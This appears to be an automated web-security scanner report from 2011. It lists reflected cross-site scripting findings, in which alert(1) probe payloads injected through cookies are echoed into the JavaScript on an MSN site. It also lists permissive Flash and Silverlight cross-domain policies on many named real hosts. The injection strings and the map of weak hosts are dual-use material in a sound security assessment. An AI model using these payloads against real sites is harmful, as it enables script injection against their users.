<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn61497"-alert(1)-"12b550c25c9"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd38"-alert(1)-"37f2d2542d7 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc5a9"-alert(1)-"7be52016318 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwndc5a9"-alert(1)-"7be52016318"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3285e"-alert(1)-"c52e77c0b7f was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b25a"-alert(1)-"ecd2518c6a1 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn2b25a"-alert(1)-"ecd2518c6a1"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93fe"-alert(1)-"ce20752a9b2 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9d95"-alert(1)-"599a6a07add was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbf7f"-alert(1)-"293cb6420bc was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d229a"-alert(1)-"e585a11d57f was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c4d"-alert(1)-"00c0d436f58 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... script'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("https://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn60c4d"-alert(1)-"00c0d436f58"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa8a7"-alert(1)-"06f8a7e059a was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:14 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 20:11:04 GMT
Connection: close
Content-Length: 100
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Connection: keep-alive
Content-Length: 109
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: c.msn.com
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Connection: keep-alive
Content-Length: 109
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: col.stc.s-msn.com
Response
HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca01
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Content-Length: 224
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: col.stj.s-msn.com
Response
HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Content-Length: 224
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: colstc.msn.com
Response
HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Content-Length: 224
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: colstj.msn.com
Response
HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Content-Length: 224
Age: 1
Date: Tue, 26 Apr 2011 18:36:36 GMT
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Expires: Wed, 25 Apr 2012 18:36:35 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: img.widgets.video.s-msn.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:58:44 GMT
Connection: keep-alive
Content-Length: 206
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.tt.omtrdc.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: rad.msn.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 18 Mar 2011 23:41:08 GMT
Accept-Ranges: bytes
ETag: "024af4c5e5cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:15 GMT
Connection: keep-alive
Content-Length: 202
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Tue, 03 May 2011 18:29:24 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:13 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "61f4da-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: api.bing.com
Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 18:36:36 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-04-26T18%3a36%3a36; expires=Fri, 06-May-2011 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=B6AEB400DC4D4E248F334E741402ECE2; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1744956&MS=1744956; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=9E15B52EB3D04623BB2A34AE4C582277; expires=Thu, 25-Apr-2013 18:36:36 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110426; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-http-request-headers-from domain="*.bing.com" he ...[SNIP]... <allow-access-from domain="*.bing.com"/> ...[SNIP]... <allow-access-from domain="blstc.msn.com"/> ...[SNIP]... <allow-access-from domain="stc.sandblu.msn-int.com"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: investing.money.msn.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Apr 2011 23:05:34 GMT
Accept-Ranges: bytes
ETag: "033a72066f9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:12 GMT
Connection: close
Content-Length: 135
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: static.ak.connect.facebook.com
Response
HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.32.145.112
X-Cnection: close
Date: Tue, 26 Apr 2011 21:03:25 GMT
Content-Length: 1473
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.actonsoftware.com
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"596-1300332243000"
Last-Modified: Thu, 17 Mar 2011 03:24:03 GMT
Content-Type: application/xml
Content-Length: 596
Date: Tue, 26 Apr 2011 21:00:34 GMT
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.msn.com
Response
HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 26 Apr 2011 18:36:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA36
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "80599becb6b4c71:803"
Last-Modified: Fri, 22 Jun 2007 10:20:15 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 214
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:36:15 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: data.moneycentral.msn.com
Response
HTTP/1.1 200 OK
Content-Length: 381
Content-Type: text/xml
Last-Modified: Tue, 03 Feb 2009 07:27:42 GMT
Accept-Ranges: bytes
ETag: "583b68e6d085c91:6fa2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:17 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: freemanco.app5.hubspot.com
Response
HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:ca8c"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:13:03 GMT
Connection: close
Set-Cookie: HUBSPOT159=554767532.0.0000; path=/
<?xml version="1.0" ?> <!DOCTYPE cross-domain-policy (View Source for full doctype...)> - <cross-domain-policy> <allow-access-from domain="www.bluemedia.com" secure="true" /> </cross-domain-p ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: moneycentral.msn.com
Response
HTTP/1.1 200 OK
Content-Length: 385
Content-Type: text/xml
Last-Modified: Tue, 08 Dec 2009 07:29:38 GMT
Accept-Ranges: bytes
ETag: "ce2e2033d877ca1:518a"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:12 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.omniture.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: c.atdmt.com
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:36 GMT
Connection: keep-alive
Content-Length: 340
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: c.msn.com
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Connection: keep-alive
Content-Length: 340
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: img.widgets.video.s-msn.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: rad.msn.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
